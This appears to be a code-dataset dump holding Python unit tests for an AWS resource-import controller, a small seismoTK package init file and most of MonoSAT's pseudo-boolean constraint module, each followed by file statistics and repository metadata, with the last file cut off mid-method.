        self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = []
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_import_button connected function
        self._test_import_resources_controller.add_import_resources_sender.emit.assert_not_called()
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()

    def test_page_cfn_stacks_import_button_emit_signal_with_expected_resources_and_switch_to_expected_page(self) -> None:
        self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = \
            [TestImportResourcesController._expected_lambda_resource]
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_import_button connected function
        self._test_import_resources_controller.add_import_resources_sender.emit.assert_called_once_with(
            [TestImportResourcesController._expected_lambda_resource])
        # Importing switches back to the view/edit page and resets this page.
        self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
        self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
        assert self._mocked_import_resources_page.search_version is None

    @patch("controller.import_resources_controller.ThreadManager")
    def test_page_typed_resources_search_button_switch_page_with_expected_index_in_sync_process(
            self, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_search_button connected function
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.NOTIFICATION_PAGE_INDEX)
        mock_thread_manager.get_instance.return_value.start.assert_called_once()

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_typed_resources_search_button_no_resource_loaded_when_search_lambda_returns_empty_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # Combobox selects the Lambda resource type; the search finds nothing.
        self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
            constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
        mock_aws_utils.list_lambda_functions.return_value = []
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_lambda_functions.assert_called_once_with(
            TestImportResourcesController._expected_region)
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_typed_resources_search_button_no_resource_loaded_when_search_lambda_raise_exception_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
            constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
        # Lambda listing fails: a notification is posted, nothing is loaded.
        mock_aws_utils.list_lambda_functions.side_effect = RuntimeError("dummyException")
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_lambda_functions.assert_called_once_with(
            TestImportResourcesController._expected_region)
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_typed_resources_search_button_no_resource_loaded_when_resource_type_is_unexpected_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # -1 means no resource type selected in the combobox.
        self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = -1
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_typed_resources_search_button_expected_resource_loaded_when_found_lambda_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
            constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
        mock_aws_utils.list_lambda_functions.return_value = [TestImportResourcesController._expected_lambda_name]
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_lambda_functions.assert_called_once_with(
            TestImportResourcesController._expected_region)
        self._mocked_proxy_model.load_resource.assert_called_once_with(
            TestImportResourcesController._expected_lambda_resource)
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    def test_page_typed_resources_import_button_nothing_happened_when_selected_resources_are_empty(self) -> None:
        self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = []
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_import_button connected function
        self._test_import_resources_controller.add_import_resources_sender.emit.assert_not_called()
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()

    def test_page_typed_resources_import_button_emit_signal_with_expected_resources_and_switch_to_expected_page(self) -> None:
        self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = \
            [TestImportResourcesController._expected_lambda_resource]
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering typed_resources_import_button connected function
        self._test_import_resources_controller.add_import_resources_sender.emit.assert_called_once_with(
            [TestImportResourcesController._expected_lambda_resource])
        self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
        self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
        assert self._mocked_import_resources_page.search_version is None
| 69
| 126
| 0.805306
| 3,359
| 27,669
| 6.023519
| 0.054778
| 0.09267
| 0.064795
| 0.082786
| 0.899521
| 0.878762
| 0.870657
| 0.851777
| 0.82573
| 0.811545
| 0
| 0.003012
| 0.136109
| 27,669
| 400
| 127
| 69.1725
| 0.843451
| 0.055007
| 0
| 0.741176
| 0
| 0
| 0.047099
| 0.042653
| 0
| 0
| 0
| 0.0025
| 0.276471
| 1
| 0.061765
| false
| 0
| 0.491176
| 0
| 0.573529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
1cf8de58674a7520d41acc340c2fad3206e72036
| 159
|
py
|
Python
|
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
from seismoTK.RACM import RACM
from seismoTK.Polarization import Polarization
from seismoTK.Polarization import read_pol
from seismoTK.S_Filter import S_Filter
| 39.75
| 46
| 0.880503
| 23
| 159
| 5.956522
| 0.391304
| 0.350365
| 0.350365
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 159
| 4
| 47
| 39.75
| 0.951389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e8066be15a41ac1c8ae9ffc6bd092451431c786e
| 59,307
|
py
|
Python
|
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
#
# Copyright (c) 2014, Sam Bayless
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import shutil
import sys
import time
import monosat.monosat_c
from monosat.logic import *
from monosat.manager import Manager
from monosat.monosat_c import Monosat, dimacs, Ineq
from tempfile import NamedTemporaryFile
debug = False
# Collects a set of graphs to encode together into a formula
class PBManager(metaclass=Manager):
    """Front end for pseudo-boolean (PB) constraints.

    Every constraint is forwarded to a pluggable backend encoder stored in
    ``self.pb`` (a MonosatPB instance by default).  The ``Assert*`` methods
    enforce a constraint unconditionally; the non-assert variants return a
    condition variable that is true iff the constraint holds.
    """

    def __init__(self):
        self.pb = MonosatPB()  # alternative backend: MinisatPlus()
        self.import_time = 0
        self.elapsed_time = 0

    def setPB(self, pb):
        """Replace the backend PB encoder."""
        self.pb = pb

    def clear(self):
        """Discard any constraints buffered in the backend."""
        if self.pb:
            self.pb.clear()

    def AssertLessThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<", weights)

    def AssertGreaterThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">", weights)

    def AssertLessEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<=", weights)

    def AssertGreaterEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">=", weights)

    def AssertEqualPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "=", weights)

    def AssertNotEqualPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "!=", weights)

    def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
        self.pb.AssertRangePB(clause, lowerBound, upperBound, weights)

    def AssertPB(self, clause, val, constraint, weights=None):
        self.pb.AssertPB(clause, val, constraint, weights)

    def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
        return self.pb.twoSidedRangePB(clause, lowerBound, upperBound, weights)

    def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
        return self.pb.twoSidedPB(clause, val, constraint, weights, condition)

    def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
        return self.pb.conditionalPB(clause, val, constraint, weights, condition)

    def conditionalRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        return self.pb.conditionalRangePB(
            clause, lowerBound, upperBound, weights, condition
        )

    def LessThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<", weights, condition)

    def GreaterThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">", weights, condition)

    def LessEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<=", weights, condition)

    def GreaterEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">=", weights, condition)

    def EqualPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "=", weights, condition)

    def AssertAtMostOne(self, clause):
        """Assert that at most one literal of ``clause`` is true.

        Fresh variables are introduced and equated to the inputs so that
        theory literals can be passed in as arguments here.
        """
        fresh_lits = []
        for lit in clause:
            fresh = Var()
            AssertEq(fresh, lit)
            fresh_lits.append(fresh)
        Monosat().AssertAtMostOne([f.getLit() for f in fresh_lits])

    def AssertExactlyOne(self, clause):
        """Assert that exactly one literal of ``clause`` is true."""
        AssertClause(clause)
        self.AssertAtMostOne(clause)

    def hasConstraints(self):
        return self.pb.hasConstraints()

    def write(self):
        self.pb.write()

    def flush(self):
        """Hand buffered constraints to the solver, then reset the backend."""
        self.pb.write()
        self.pb.clear()
class MonosatPB:
    """Encode pseudo-boolean (PB) constraints via MonoSAT's native PB API.

    Each ``Assert*`` method enforces ``sum(weights[i]*clause[i]) <op> val``
    over a list of literals; missing weights default to 1.  The non-assert
    variants return a condition variable instead of asserting outright.
    Constraints are forwarded to the solver immediately (nothing is
    buffered in this object).
    """

    def __init__(self):
        self._monosat = monosat.monosat_c.Monosat()

    def clear(self):
        # Nothing buffered locally; constraints go straight to the solver.
        pass

    def AssertLessThanPB(self, clause, val, weights=None):
        """Assert weighted sum < val."""
        self.AssertPB(clause, val, "<", weights)

    def AssertGreaterThanPB(self, clause, val, weights=None):
        """Assert weighted sum > val."""
        self.AssertPB(clause, val, ">", weights)

    def AssertLessEqPB(self, clause, val, weights=None):
        """Assert weighted sum <= val."""
        self.AssertPB(clause, val, "<=", weights)

    def AssertGreaterEqPB(self, clause, val, weights=None):
        """Assert weighted sum >= val."""
        self.AssertPB(clause, val, ">=", weights)

    def AssertEqualPB(self, clause, val, weights=None):
        """Assert weighted sum == val."""
        self.AssertPB(clause, val, "=", weights)

    def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Assert lowerBound <= weighted sum <= upperBound (inclusive)."""
        if lowerBound == upperBound:
            self.AssertEqualPB(clause, lowerBound, weights)
        else:
            self.AssertGreaterEqPB(clause, lowerBound, weights)
            self.AssertLessEqPB(clause, upperBound, weights)

    def getIneq(self, constraint):
        """Translate an operator string into the native ``Ineq`` enum.

        Raises:
            Exception: for operators with no direct native counterpart
                ('!=' is rewritten by AssertPB before reaching here).
        """
        if constraint == "<":
            return Ineq.LT
        elif constraint == "<=":
            return Ineq.LEQ
        elif constraint == "=" or constraint == "==":
            return Ineq.EQ
        elif constraint == ">=":
            return Ineq.GEQ
        elif constraint == ">":
            # BUGFIX: '>' previously returned Ineq.GEQ (identical to the
            # '>=' branch), silently weakening strict greater-than
            # constraints to greater-or-equal.
            return Ineq.GT
        else:
            raise Exception("Unknown operator " + str(constraint))

    def AssertPB(self, clause, val, constraint, weights=None):
        """Assert a PB constraint through the native solver.

        '!=' / '<>' is rewritten via AssertNotEqualPB; every other operator
        is passed through.  Weights are padded with 1s to the clause
        length; the caller's weight list is never modified.
        """
        if constraint == "!=" or constraint == "<>":
            self.AssertNotEqualPB(clause, val, weights)
            return
        nclause = [l.getLit() for l in clause]
        # Copy before padding so the caller's list is left untouched.
        nweights = list(weights) if weights is not None else []
        while len(nweights) < len(nclause):
            nweights.append(1)
        self._monosat.AssertPB(nclause, nweights, self.getIneq(constraint), val)

    def _negate(self, constraint):
        """Return the operator whose truth is the complement of ``constraint``.

        Equality cannot be negated into a single opb operator ('!=' is not
        directly supported in opb format), so it raises.
        """
        if constraint == "<":
            return ">="
        elif constraint == "<=":
            return ">"
        elif constraint == ">":
            return "<="
        elif constraint == ">=":
            return "<"
        elif constraint == "=":
            raise Exception("Cannot negate equality")
        else:
            raise Exception("Unknown operator " + constraint)

    def AssertNotEqualPB(self, clause, value, weights=None):
        """Assert weighted sum != value (via a negated two-sided equality)."""
        Assert(Not(self.twoSidedPB(clause, value, "=", weights)))

    def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Return a condition var true iff lowerBound <= weighted sum <= upperBound.

        Because opb has no inequality operator, when the condition is false
        an auxiliary choice variable selects whether the sum must exceed
        upperBound or fall below lowerBound.
        """
        if lowerBound == upperBound:
            return self.twoSidedPB(clause, lowerBound, "=", weights)
        elif lowerBound is None:
            return self.twoSidedPB(clause, upperBound, "<=", weights)
        elif upperBound is None:
            return self.twoSidedPB(clause, lowerBound, ">=", weights)
        condition = Var()
        self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
        # If we are not within [lowerBound, upperBound], we must be outside it:
        # condition_g selects which side of the range is violated.
        condition_g = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(And(Not(condition), condition_g), Equal(c, v))
        self.AssertPB(conditional_clause, upperBound, ">", weights)
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(And(Not(condition), Not(condition_g)), Equal(c, v))
        self.AssertPB(conditional_clause, lowerBound, "<", weights)
        return condition

    def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
        """Return a condition var equivalent to the constraint holding.

        The constraint is enforced iff the returned variable is true, and
        its negation is enforced iff the variable is false.
        """
        if constraint == "!=" or constraint == "<>":
            return Not(self.twoSidedPB(clause, val, "=", weights, condition))
        if condition is None:
            condition = Var()
        nclause = list(clause)
        # Copy before padding so the caller's weight list is left untouched.
        weights = list(weights) if weights is not None else []
        while len(weights) < len(clause):
            weights.append(1)
        if constraint != "=":
            # A two-sided constraint is just two one-sided conditional constraints.
            self.conditionalPB(nclause, val, constraint, weights, condition)
            self.conditionalPB(
                nclause, val, self._negate(constraint), weights, Not(condition)
            )
        else:
            # Is there a more efficient way to build a two-sided equality
            # constraint out of one-sided constraints?
            self.conditionalPB(nclause, val, ">=", weights, condition)
            self.conditionalPB(nclause, val, "<=", weights, condition)
            self.conditionalPB(nclause, val, ">", weights, Not(condition))
            self.conditionalPB(nclause, val, "<", weights, Not(condition))
        return condition

    def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
        """Legacy encoding kept for reference: copies the clause through
        implication-guarded fresh variables."""
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(condition, Equal(c, v)))
        self.AssertPB(conditional_clause, val, constraint, weights)
        return condition

    def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
        """Enforce the constraint only when the returned variable is true.

        Implemented by appending an internal condition literal whose weight
        is large enough to trivially satisfy the constraint whenever that
        literal is set, so the real constraint only bites when the returned
        variable is true.
        """
        if constraint == "!=" or constraint == "<>":
            v = Or(
                self.conditionalPB(clause, val, "<", weights),
                self.conditionalPB(clause, val, ">", weights),
            )
            if condition is not None:
                AssertEq(v, condition)
            return v
        if condition is None:
            condition = Var()
        else:
            # Work with the negation of the supplied condition internally.
            v = Var()
            AssertEq(v, Not(condition))
            condition = v
        # Copy before padding so the caller's weight list is left untouched.
        weights = list(weights) if weights is not None else []
        while len(weights) < len(clause):
            weights.append(1)
        # NOTE: the PB solver requires its variables to be input variables in
        # the circuit; conversion of non-input vars is currently disabled.
        nclause = list(clause)
        if (
            constraint == ">"
            or constraint == ">="
            or constraint == "="
            or constraint == "=="
        ):
            # Weight big enough that the condition literal alone satisfies
            # the >=-side regardless of all other (possibly negative) weights.
            negWeightSum = 0
            for w in weights:
                if w < 0:
                    negWeightSum += abs(w)
            total = negWeightSum + val
            if constraint == ">":
                total += 1
            nclause.append(condition)
            weights.append(total)
            if constraint == ">" or constraint == ">=":
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, ">=", weights)
            nclause.pop()
            weights.pop()
        if (
            constraint == "<"
            or constraint == "<="
            or constraint == "="
            or constraint == "=="
        ):
            posWeightSum = 0
            for w in weights:
                if w > 0:
                    posWeightSum += abs(w)
            total = posWeightSum + val
            if constraint == "<":
                total += 1
            nclause.append(condition)
            weights.append(-total)
            if constraint == "<" or constraint == "<=":
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, "<=", weights)
            nclause.pop()
            weights.pop()
        # The property is enforced when the internal condition var is false.
        return Not(condition)

    def conditionalRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        """Enforce lowerBound <= weighted sum <= upperBound when ``condition`` holds."""
        if lowerBound == upperBound:
            return self.EqualPB(clause, lowerBound, weights, condition)
        elif lowerBound is None:
            return self.conditionalPB(clause, upperBound, "<=", weights, condition)
        elif upperBound is None:
            return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(condition, Equal(c, v))
        self.AssertPB(conditional_clause, lowerBound, ">=", weights)
        self.AssertPB(conditional_clause, upperBound, "<=", weights)
        return condition

    def LessThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<", weights, condition)

    def GreaterThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">", weights, condition)

    def LessEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<=", weights, condition)

    def GreaterEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">=", weights, condition)

    def EqualPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "=", weights, condition)

    def hasConstraints(self):
        # Constraints are forwarded immediately, so none are ever buffered.
        return False

    def write(self):
        # Not required; monosat flushes PB constraints automatically.
        self._monosat.flushPB()
class MonosatTheoryPB:
    """Buffer PB constraints and serialize them in MonoSAT's textual
    'pb_lt' format via ``write(filename)``.

    Each buffered entry is a tuple
    ``(clause, val, constraint, weights, conditionVar, oneSided)`` where
    ``conditionVar is None`` marks an unconditional constraint and
    ``oneSided`` distinguishes one-sided from two-sided conditions.
    """

    def __init__(self):
        self.constraints = []

    def clear(self):
        self.constraints = []

    def hasConstraints(self):
        return len(self.constraints) > 0

    def AssertLessThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<", weights)

    def AssertGreaterThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">", weights)

    def AssertLessEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<=", weights)

    def AssertGreaterEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">=", weights)

    def AssertEqualPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "=", weights)

    def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Assert lowerBound <= weighted sum <= upperBound (inclusive)."""
        if lowerBound == upperBound:
            self.AssertEqualPB(clause, lowerBound, weights)
        else:
            self.AssertGreaterEqPB(clause, lowerBound, weights)
            self.AssertLessEqPB(clause, upperBound, weights)

    def AssertPB(self, clause, val, constraint, weights=None):
        """Record an unconditional constraint."""
        self.constraints.append(
            (
                list(clause),
                val,
                constraint,
                list(weights) if weights is not None else [],
                None,   # no condition variable
                False,  # not one-sided
            )
        )

    def twoSidedRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        """Return a condition var equivalent to lowerBound <= sum <= upperBound."""
        if condition is None:
            condition = Var()
        if lowerBound == upperBound:
            # BUGFIX: previously called the nonexistent self.twoSided(...),
            # which raised AttributeError at runtime.
            return self.twoSidedPB(clause, lowerBound, "=", weights, condition)
        c1 = self.twoSidedPB(clause, lowerBound, ">=", weights)
        c2 = self.twoSidedPB(clause, upperBound, "<=", weights)
        # condition was defaulted above, so it is never None here.
        AssertEq(condition, And(c1, c2))
        return condition

    def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
        """Record a two-sided constraint tied to a condition variable."""
        if condition is None:
            condition = Var()
        self.constraints.append(
            (
                list(clause),
                val,
                constraint,
                list(weights) if weights is not None else [],
                condition,
                False,  # two-sided
            )
        )
        return condition

    def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
        """Record a one-sided constraint enforced only when ``condition`` holds."""
        if condition is None:
            condition = Var()
        self.constraints.append(
            (
                list(clause),
                val,
                constraint,
                list(weights) if weights is not None else [],
                condition,
                True,  # one-sided
            )
        )
        return condition

    def conditionalRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        """Record lowerBound <= sum <= upperBound tied to ``condition``."""
        if lowerBound == upperBound:
            return self.conditionalPB(clause, lowerBound, "=", weights, condition)
        c1 = self.twoSidedPB(clause, lowerBound, ">=", weights)
        c2 = self.twoSidedPB(clause, upperBound, "<=", weights)
        if condition is None:
            condition = And(c1, c2)
        else:
            Assert(Equal(condition, And(c1, c2)))
        return condition

    def LessThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<", weights, condition)

    def GreaterThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">", weights, condition)

    def LessEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<=", weights, condition)

    def GreaterEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">=", weights, condition)

    def EqualPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "=", weights, condition)

    def write(self, filename):
        """Append all buffered constraints to ``filename`` in 'pb_lt' format.

        Line layout: ``pb_lt <n> <lits...> <m> <weights...> <op> <val>``
        followed by ``0`` (unconditional), or ``1``/``2`` (one-/two-sided)
        and the condition literal.
        """
        # BUGFIX: the file handle was previously never closed; use a
        # context manager so the append is flushed deterministically.
        with open(filename, "a") as f:
            for (
                clause,
                val,
                constraint,
                weights,
                conditionVar,
                oneSided,
            ) in self.constraints:
                assert len(clause) == len(weights) or len(weights) == 0
                assert len(clause) > 0
                f.write("pb_lt " + str(len(clause)) + " ")
                for v in clause:
                    f.write(str(v.getInputLiteral()) + " ")
                f.write(str(len(weights)) + " ")
                for w in weights:
                    f.write(str(w) + " ")
                f.write(constraint + " " + str(val) + " ")
                if conditionVar is None:
                    f.write("0")
                else:
                    f.write("1 " if oneSided else "2 ")
                    f.write(str(conditionVar.getInputLiteral()))
                f.write("\n")
class MinisatPlus:
    """Buffer PB constraints, encode them to CNF with an external
    minisat+-compatible binary ('monosatpb'), and import the resulting
    clauses into MonoSAT.

    Constraints are normalized on entry (AssertPB) so that all stored
    literals have positive polarity, then written to a temporary .opb
    file and converted by the external tool in ``write()``.
    """

    def __init__(self):
        self.constraints = []

    def clear(self):
        self.constraints = []

    def AssertLessThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<", weights)

    def AssertGreaterThanPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">", weights)

    def AssertLessEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "<=", weights)

    def AssertGreaterEqPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, ">=", weights)

    def AssertEqualPB(self, clause, val, weights=None):
        self.AssertPB(clause, val, "=", weights)

    def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Assert lowerBound <= weighted sum <= upperBound (inclusive)."""
        if lowerBound == upperBound:
